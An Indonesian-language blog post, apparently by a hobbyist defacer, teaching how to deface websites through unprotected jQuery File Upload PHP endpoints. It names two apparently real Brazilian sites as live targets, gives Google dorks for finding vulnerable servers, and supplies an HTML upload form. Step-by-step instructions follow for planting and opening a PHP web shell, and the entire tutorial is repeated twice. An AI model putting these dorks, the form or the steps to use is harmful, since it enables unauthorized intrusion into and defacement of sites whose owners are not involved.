Assalamualaikum wr.wb
Kembali lagi bersama ane diblog ane tentunya :v
Oke disi ane akan bagi cara deface lewat android people.
Bagi yang belom tau apa itu deface nih artikelnyahttp://linkshrink.net/7H1yCx
Okeh deh Langsung aja tutorial nya :'v
TUTORIAL DEFACE JQUERY FILE UPLOAD / FILE ARRAY
Saya kasih contoh 2 web dibawah ini vuln - LIVE TARGET
http://www.liberdadeshopping.com.br/dashboard/server/php/
http://www.samaraveras.com.br/dashboard/server/php/
dork :
lewat google gambar
inurl:/server/php/files/
inurl:/foto/server/php/files/
inurl:/images/server/php/files/
inurl:/admin/server/php/files/
entar lu buka gambarnya
lewat google biasa
inurl:/assets/global/plugins/jquery-file-upload/server/php/
use your brain oke,, pokoknya exploit di /server/php/ ,, di /server/php muncul kaya gini nih biasanya -> files []
atau kalo gak muncul coba liat /server/php/index.php kalo not found gak vuln
Ini CSRF nya
<form method="POST" action=" target.co.il/.../server/php/ "enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button></form>
save as .html
1.Siapkan shell
2.Buka web yang vuln,, and copy urlnya target.co.il/../server/php/
3.paste url di CSRF
4.buka csrfnya pake (buka pake browser atau lu upload csrfnya ke web yang udah lu tanem shell)
5.udah lu buka kan?? nah tinggal upload shell lu aja ,,, bisa langsung atau lu bypas extensinya
6. tanda shell masuk yaitu ada tulisan
{"files":[{"name":"nama shell lu.php","size":29,"type":"application\/octet-stream","url":"http:\/\/target.co.il\/..\/server\/php\/files\/nama shell lu.php
akses shell di /server/php/files/
NB : apabila lu pas buka shell malah kedownload berarti webnya juga gak vuln
SEMOGA BERMANFAAT
IGN ML : Yudha_00
Kembali lagi bersama ane diblog ane tentunya :v
Oke disi ane akan bagi cara deface lewat android people.
Bagi yang belom tau apa itu deface nih artikelnyahttp://linkshrink.net/7H1yCx
Okeh deh Langsung aja tutorial nya :'v
TUTORIAL DEFACE JQUERY FILE UPLOAD / FILE ARRAY
Saya kasih contoh 2 web dibawah ini vuln - LIVE TARGET
http://www.liberdadeshopping.com.br/dashboard/server/php/
http://www.samaraveras.com.br/dashboard/server/php/
dork :
lewat google gambar
inurl:/server/php/files/
inurl:/foto/server/php/files/
inurl:/images/server/php/files/
inurl:/admin/server/php/files/
entar lu buka gambarnya
lewat google biasa
inurl:/assets/global/plugins/jquery-file-upload/server/php/
use your brain oke,, pokoknya exploit di /server/php/ ,, di /server/php muncul kaya gini nih biasanya -> files []
atau kalo gak muncul coba liat /server/php/index.php kalo not found gak vuln
Ini CSRF nya
<form method="POST" action=" target.co.il/.../server/php/ "enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button></form>
save as .html
1.Siapkan shell
2.Buka web yang vuln,, and copy urlnya target.co.il/../server/php/
3.paste url di CSRF
4.buka csrfnya pake (buka pake browser atau lu upload csrfnya ke web yang udah lu tanem shell)
5.udah lu buka kan?? nah tinggal upload shell lu aja ,,, bisa langsung atau lu bypas extensinya
6. tanda shell masuk yaitu ada tulisan
{"files":[{"name":"nama shell lu.php","size":29,"type":"application\/octet-stream","url":"http:\/\/target.co.il\/..\/server\/php\/files\/nama shell lu.php
akses shell di /server/php/files/
NB : apabila lu pas buka shell malah kedownload berarti webnya juga gak vuln
SEMOGA BERMANFAAT
Okeh udah paham?Sekian dari ane :v
YouTube:https://www.youtube.com/channel/UCBcFPoVBbUe-PVRN4i5kwcg
IGN VG :V : yudha00IGN ML : Yudha_00


Tidak ada komentar:
Posting Komentar